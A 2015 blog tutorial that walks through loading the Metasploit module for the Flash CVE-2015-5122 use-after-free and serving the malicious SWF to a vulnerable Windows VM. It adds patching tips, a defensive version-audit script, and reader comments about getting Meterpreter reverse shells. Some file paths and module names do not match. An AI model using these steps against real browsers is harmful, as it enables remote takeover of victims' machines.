Metasploit CVE-2015-5122 Flash Exploit Tutorial

By Hacking Tutorials on July 17, 2015 Metasploit Tutorials

In this tutorial we will import the CVE-2015-5122 (Adobe Flash opaqueBackground Use After Free) zero-day Flash exploit module into Metasploit and have a vulnerable setup download the malicious Flash file. Recent versions of Adobe Flash Player contain critical vulnerabilities within the ActionScript 3 ByteArray, opaqueBackground and BitmapData classes. Exploiting one of these vulnerabilities could allow a remote attacker to execute arbitrary code on the vulnerable system. CVE-2015-5122 is the third zero-day exploit from the Hacking Team data breach and targets Adobe Flash Player (18.0.0.203) on Windows 7, Windows 8.1 and Google Chrome on Linux-based computers. At the time of writing, Adobe has already released security updates for Windows, Mac and Linux. This tutorial is for informational purposes only.

Metasploit CVE-2015-5122 Tutorial

First download the exploit code and make it available to Metasploit by creating an empty document named:

Adobe_Flash_HackingTeam_exploit.rb

Then download the payload here:

https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/CVE-2015-5122

And add it to the following directory:

/usr/share/metasploit-framework/data/exploits/CVE-2015-5119/msf.swf

Now copy the exploit code and paste it into the document.

Use the following command to move the file from the desktop to the Metasploit modules folder (create the flash folder first if needed):
mv /root/Desktop/Adobe_Flash_HackingTeam_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/flash/

Use the following command to check if the file has been actually copied to the destination folder:

ls /usr/share/metasploit-framework/modules/exploits/windows/flash/

Let’s open a new terminal and start Metasploit (and services if not already started) using the following command(s):
service postgresql start
service metasploit start
msfconsole

Now that we’ve got Metasploit up and running with our newly imported exploit loaded, we use the following command to search for it:

search hackingteam

Now use the following command to use the newly added exploit:

use exploit/windows/flash/Adobe_Flash_HackingTeam_Exploit

Let’s check the options for the Metasploit CVE-2015-5122 module with the following command:

show options

We will keep the default options and type “run” or “exploit” to start the exploit:

exploit

Let’s open the link from a Windows 8.1 virtual machine with a vulnerable browser (Firefox) and a vulnerable version of Flash Player (18.0.0.203) installed.

How to avoid getting infected by CVE-2015-5122 and other exploits…

– Update Flash Player and keep it up-to-date.
– Install security patches and keep your OS up-to-date.
– Install a virus scanner and firewall and keep it updated.
– Keep your browser up-to-date.
– Do not install unneeded plug-ins.
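
To act on the first and last points across more than one machine, the script below audits an inventory of installed Flash Player versions. It is an added example, not part of the original tutorial. The `host,flash_version` input format, the host names and the sample versions are constructed, and treating 18.0.0.203 (the build named above) as an upper bound for "needs updating" is an assumption.

```sh
#!/bin/sh
# Added example (not from the tutorial): flag hosts whose Flash Player version
# is at or below the build the tutorial names as exploitable.
VULNERABLE_MAX="18.0.0.203"   # from the tutorial; using it as an upper bound is an assumption

# Accept only digits and single dots, so nothing else reaches the numeric tests.
is_version() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    return 0
}

# version_le A B: succeed when dotted version A <= B, comparing the first four
# fields as integers (plain string comparison would rank 9.x above 18.x).
version_le() {
    a=$1 b=$2
    for n in 1 2 3 4; do
        x=${a%%.*} y=${b%%.*}
        if [ "$x" -lt "$y" ]; then return 0; fi
        if [ "$x" -gt "$y" ]; then return 1; fi
        case $a in *.*) a=${a#*.} ;; *) a=0 ;; esac
        case $b in *.*) b=${b#*.} ;; *) b=0 ;; esac
    done
    return 0
}

# Read "host,flash_version" lines on stdin and print "host version status".
audit_inventory() {
    while IFS=, read -r host version; do
        case $host in ''|'#'*) continue ;; esac
        if [ -z "$version" ]; then status=NOT_INSTALLED
        elif ! is_version "$version"; then status=UNPARSEABLE
        elif version_le "$version" "$VULNERABLE_MAX"; then status=UPDATE
        else status=OK
        fi
        printf '%s %s %s\n' "$host" "${version:--}" "$status"
    done
}

# Constructed inventory: host names and versions are made up for this example.
SAMPLE_INVENTORY='ws-01,18.0.0.203
ws-02,18.0.0.1000
ws-03,9.0.124.0
ws-04,
ws-05,n/a'

printf '%s\n' "$SAMPLE_INVENTORY" | audit_inventory
```

Hosts reported as UPDATE need a newer Flash Player, and UNPARSEABLE entries should be checked by hand rather than assumed safe.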

7 Comments

  1. joe on July 23, 2015 10:25 pm

    going to work really nice with no payload

    • Hacking Tutorials on July 24, 2015 8:39 am

      There’s a download link to the payload in the tutorial.

  2. Tom on July 24, 2015 10:21 am

    Hi,

    Nice tuto, but, what’s the next step after the “magic” line :

    [*] 192.168.0.12 adobe_flash_hacking_team_uaf – Sending SWF…

    Should I run a payload before running the exploit? I don’t really understand how to use this exploit…

    • Hacking Tutorials on July 25, 2015 4:07 pm

      Hi Tom,

      Thanks!

      The payload is run by the victim. After that a Meterpreter session will be opened.

      https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

  3. Answer on July 24, 2015 3:31 pm

    Which source code to copy? There are many files in this site:
    https://github.com/rapid7/metasploit-framework/commit/255d8ed096cf25b7207ea8e9b4553f66911b00da

    • Hacking Tutorials on July 25, 2015 4:06 pm

      This source code: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb

  4. Tom on July 27, 2015 10:06 am

    I used the payload correctly (meterpreter reverse tcp) but I’m stuck after this line:
    [*] 192.168.0.12 adobe_flash_hacking_team_uaf – Sending SWF…
    The meterpreter session never appears.

